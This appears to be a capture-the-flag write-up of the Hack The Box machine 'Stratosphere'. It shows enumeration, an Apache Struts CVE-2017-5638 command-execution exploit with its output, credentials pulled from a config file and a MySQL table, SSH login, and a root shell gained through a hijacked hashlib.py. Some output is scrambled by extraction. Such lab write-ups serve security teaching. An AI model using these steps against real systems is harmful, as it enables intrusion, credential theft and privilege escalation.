Add to collection(s) Add to saved
  1. No category
Uploaded by Htet Naing

Stratosphere

advertisement 
First, we need to enumerate using nmap.
$nmap 10.10.10.64
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-12 05:31 UTC
Nmap scan report for 10.10.10.64
Host is up (0.0028s latency).
Not shown: 997 filtered ports
PORT
STATE SERVICE
22/tcp
open
ssh
80/tcp
open
http
8080/tcp open
http-proxy
HTTP and HTTP-Proxy is open. Let's enumerate http first.
$gobuster dir -u http://10.10.10.64/ -w /opt/useful/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
-x .php,.txt,.html
/index.html
(Status: 200) [Size: 1708]
/manager
(Status: 302) [Size: 0] [--> /manager/]
/GettingStarted.html
(Status: 200) [Size: 203]
/Monitoring
(Status: 302) [Size: 0] [--> /Monitoring/]
manager is apache tomcat http auth. When we go to Monitoring , we will redirect to
http://10.10.10.64/Monitoring/example/Welcome.action . I don't know with is .action ext. So, I google. It is Apache
Structs. . And then i find Apache Structs Vulnerability . This is the exploit code from https://github.com/rapid7/metasploit-
framework/issues/8064.
python exploit.py http://10.10.10.64/Monitoring/example/Welcome.action 'id'
[*] CVE: 2017-5638 - Apache Struts2 S2-045
[*] cmd: id
uid=115(tomcat8) gid=119(tomcat8) groups=119(tomcat8)
Let's use ls -al command. With ls -al , you will see db_connect file.
python exploit.py http://10.10.10.64/Monitoring/example/Welcome.action 'ls -al'
[*] CVE: 2017-5638 - Apache Struts2 S2-045
[*] cmd: ls -al
total 24
drwxr-xr-x
5 root
root
4096 Dec 12 00:26 .
drwxr-xr-x 42 root
root
4096 Oct
3
2017 ..
lrwxrwxrwx
1 root
root
12 Sep
3
2017 conf -> /etc/tomcat8
-rw-r--r--
1 root
root
68 Oct
2
2017 db_connect
drwxr-xr-x
2 tomcat8 tomcat8 4096 Sep
3
2017 lib
lrwxrwxrwx
1 root
root
3
2017 logs -> ../../log/tomcat8
drwxr-xr-x
2 root
root
drwxrwxr-x
4 tomcat8 tomcat8 4096 Feb 10
2018 webapps
lrwxrwxrwx
1 root
2017 work -> ../../cache/tomcat8
root
17 Sep
4096 Dec 12 00:26 policy
19 Sep
3
Read db_connect file.
python exploit.py http://10.10.10.64/Monitoring/example/Welcome.action 'cat db_connect'
[*] CVE: 2017-5638 - Apache Struts2 S2-045
[*] cmd: cat db_connect
[ssn]
user=ssn_admin
pass=AWs64@on*&
[users]
user=admin
pass=admin
Dump using this credentials from mysql databases.
python exploit.py http://10.10.10.64/Monitoring/example/Welcome.action 'mysql -uadmin -padmin -e "use
users;select * from accounts;"'
[*] CVE: 2017-5638 - Apache Struts2 S2-045
[*] cmd: mysql -uadmin -padmin -e "use users;select * from accounts;"
fullName
password
Richard F. Smith
username
9tc*rhKuG5TyXvUJOrE^5CK7k
richard
Using this credentials to login ssh.
ssh richard@10.10.10.64
The authenticity of host '10.10.10.64 (10.10.10.64)' can't be established.
ECDSA key fingerprint is SHA256:tQZo8j1TeVASPxWyDgqJf8PaDZJV/+LeeBZnjueAW/E.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.64' (ECDSA) to the list of known hosts.
richard@10.10.10.64's password: 9tc*rhKuG5TyXvUJOrE^5CK7k
Linux stratosphere 4.9.0-6-amd64 #1 SMP Debian 4.9.82-1+deb9u2 (2018-02-21) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Feb 27 16:26:33 2018 from 10.10.14.2
richard@stratosphere:~$
When we run this file and solved puzzles, we get error.
richard@stratosphere:~$ sudo python /home/richard/test.py
Solve: 5af003e100c80923ec04d65933d382cb
kaybboo!
You got it!
Now what's this one? d24f6fb449855ff42344feff18ee2819033529ff
ninjaabisshinobi
WOW, you're really good at this!
How about this? 91ae5fc9ecbca9d346225063f23d2bd9
legend72
OK, OK! I get it. You know how to crack hashes...
Last one, I promise:
9efebee84ba0c5e030147cfd1660f5f2850883615d444ceecf50896aae083ead798d13584f52df0179df0200a3e1a122aa738beff263b49d2443
Fhero6610
sh: 1: /root/success.py: not found
Use python library hijacking. This is hashlib.py
import os
os.system('/bin/bash')
Run again this file, you will get root shell.
richard@stratosphere:~$ sudo python /home/richard/test.py
root@stratosphere:/home/richard# id;w;
uid=0(root) gid=0(root) groups=0(root)
03:02:39 up
2:35,
1 user,
load average: 0.00, 0.00, 0.00
USER
TTY
FROM
LOGIN@
IDLE
JCPU
PCPU WHAT
richard
pts/0
10.10.14.9
02:53
7.00s
0.08s
0.03s sshd: richard [priv]
Related documents
Dr. Richard Mezeske uses Power Point to model a... instruction lesson on the role of prior knowledge in learning,
Dr. Richard Mezeske uses Power Point to model a... instruction lesson on the role of prior knowledge in learning,
Richard Salvage Group Managing Director, Medsa Group
Richard Salvage Group Managing Director, Medsa Group
Richard Anson CEO and Founder, Reevoo
Richard Anson CEO and Founder, Reevoo
Richard Salvage
Richard Salvage
Download
advertisement